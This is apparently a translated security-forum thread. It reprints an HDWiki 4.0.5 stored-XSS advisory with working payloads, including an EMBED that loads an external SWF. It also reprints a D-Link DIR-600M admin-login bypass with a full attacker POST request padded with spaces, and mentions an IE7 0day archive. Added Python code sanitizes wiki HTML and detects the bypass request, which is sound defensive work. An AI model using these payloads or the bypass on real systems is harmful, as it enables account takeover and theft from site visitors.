
Got pwned for the first time

Starting to hunker down and study. Any buddies want to team up?
Topic posted by: zhneb

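Company commander, there's a fresh one here waiting to get pwned. Bring a truckload of your troops, yes, the Dongfeng heavy-truck kind!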


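HDWiki-V4.0.5 0day cross-site scripting (XSS) vulnerability

Affected version: HDWiki-V4.0.5
Severity: High
Description: Through penetration testing, the Antiy Labs Information Security Research and Emergency Response Center (Antiy CERT) found that HDWiki-V4.0.5 does not properly filter the HTML elements in an entry when the entry is created or edited, which allows persistent cross-site scripting and the planting of malicious code in pages. A user who visits a page that an attacker has modified and injected with malicious cross-site code may have sensitive information stolen, be infected with a trojan, and so on.
Note: In testing, this cross-site vulnerability did not work against the official Hudong Baike (互动百科) main site.
Test environment: Windows XP SP2+IE6.0 & Windows XP SP3+IE8.0
Test method: The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only. Use at your own risk!

1. URL: http://10.0.6.139/wiki/index.php?doc-view-2
XSSCode: <IMG SRC=javascript:alert('XSS')>

2. URL: http://10.0.6.139/wiki/index.php?doc-view-3
XSSCode: <IMG SRC="javascript:alert('XSS');">

3. URL: http://10.0.6.139/wiki/index.php?doc-view-4
XSSCode: <EMBED SRC="http://10.0.54.55/33.swf" AllowScriptAccess="always"></EMBED>
http://10.0.54.55/33.swf is a Flash link. The Flash file internally uses a function that pops up a web page, so as long as the Flash is parsed successfully and triggers this function, a web page pops up.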


















Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
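The missing filtering described in the HDWiki post above, shown from the fixing side as an added example (not part of the original post and not HDWiki's own code): an allowlist sanitizer applied to entry HTML before it is stored. The tag and attribute policy and all function names are assumptions made for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed policy for this example: what an entry body may keep.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(),
           "a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
VOID = {"br", "img"}
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)

def safe_url(value):
    # Browsers ignore tabs/newlines inside a URL, so drop whitespace and controls first.
    cleaned = "".join(ch for ch in value if ch > " ")
    m = SCHEME.match(cleaned)
    # No scheme means a relative URL, which stays on the wiki's own origin.
    return m is None or m.group(1).lower() in SAFE_SCHEMES

class EntrySanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return                      # <embed>, <script>, <object>, ...
        kept = {}
        for name, value in attrs:       # names arrive lower-cased, values unescaped
            if name in ALLOWED[tag] and value is not None:
                if name not in URL_ATTRS or safe_url(value):
                    kept[name] = value
        if tag == "img" and "src" not in kept:
            return                      # image without a usable source is dropped
        attr_text = "".join(f' {n}="{escape(v, quote=True)}"' for n, v in kept.items())
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize_entry(html_text):
    parser = EntrySanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)
```

All three XSSCode strings from the post come back as an empty string, while ordinary links and images pass through with event-handler attributes removed.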


D-Link DIR-600M Wireless N 150 administrator password bypass vulnerability
# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass
# Date: 19-05-2017
# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Exploit Author: Touhid M.Shaikh
# Vendor : www.dlink.com
# Contact : http://twitter.com/touhidshaikh22
# Version: Hardware version: C1
Firmware version: 3.04
# Tested on:All Platforms


1) Description

After Successfully Connected to D-Link DIR-600M Wireless N 150
Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's
Admin Panel Just by Feeding Blank Spaces in the password Field.

It's More Dangerous when your Router has a public IP with remote login
enabled.

For More Details : www.touhidshaikh.com/blog/

IN MY CASE,
Router IP : http://192.168.100.1



Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring

2) Proof of Concept

Step 1: Go to
Router Login Page : http://192.168.100.1/login.htm

Step 2:
Fill username: admin
And in Password Fill more than 20 times Spaces(" ")



Our request looks like the one below.
-----------------ATTACKER REQUEST-----------------------------------

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send



--------------------END here------------------------

Bingooo You got admin Access on router.
Now you can download/upload settings, Change settings etc.
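A check that a reverse proxy or log pipeline in front of the router's admin interface could apply to the request pattern shown in the post above, as an added example (not part of the original post or the advisory author's code). The `/login.cgi` path and `password` field come from that request; the 64-character limit, the function names and the sample captures are assumptions.

```python
from urllib.parse import parse_qs

LOGIN_PATHS = {"/login.cgi"}   # endpoint taken from the request shown in the post
MAX_PASSWORD_LEN = 64          # assumed upper bound for this example

def inspect_request(raw):
    """Return findings for one captured HTTP request given as text."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST":
        return []
    if parts[1].split("?", 1)[0] not in LOGIN_PATHS:
        return []
    findings = []
    # parse_qs decodes "+" and %20 to spaces, the value the login handler receives.
    for pw in parse_qs(body.strip(), keep_blank_values=True).get("password", []):
        if pw and not pw.strip():
            findings.append(f"whitespace-only password ({len(pw)} chars)")
        if len(pw) > MAX_PASSWORD_LEN:
            findings.append(f"password longer than {MAX_PASSWORD_LEN} chars")
    return findings

FORM = "Content-Type: application/x-www-form-urlencoded\r\n\r\n"

# Constructed sample captures (not taken from real traffic).
SAMPLES = {
    "blank-padded": "POST /login.cgi HTTP/1.1\r\nHost: 192.168.100.1\r\n" + FORM
                    + "username=Admin&password=" + "+" * 24
                    + "&submit.htm%3Flogin.htm=Send",
    "normal": "POST /login.cgi HTTP/1.1\r\nHost: 192.168.100.1\r\n" + FORM
              + "username=admin&password=S3cure%21pass&submit.htm%3Flogin.htm=Send",
    "other-page": "GET /login.htm HTTP/1.1\r\nHost: 192.168.100.1\r\n\r\n",
}

def scan(samples):
    """Map each flagged capture name to its findings; clean captures are omitted."""
    flagged = {}
    for name, raw in samples.items():
        findings = inspect_request(raw)
        if findings:
            flagged[name] = findings
    return flagged

if __name__ == "__main__":
    print(scan(SAMPLES))
```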


IE7 0day, rumored to be selling for 120,000 (12W)
The source code is in the attachment package: IE7-0day.rar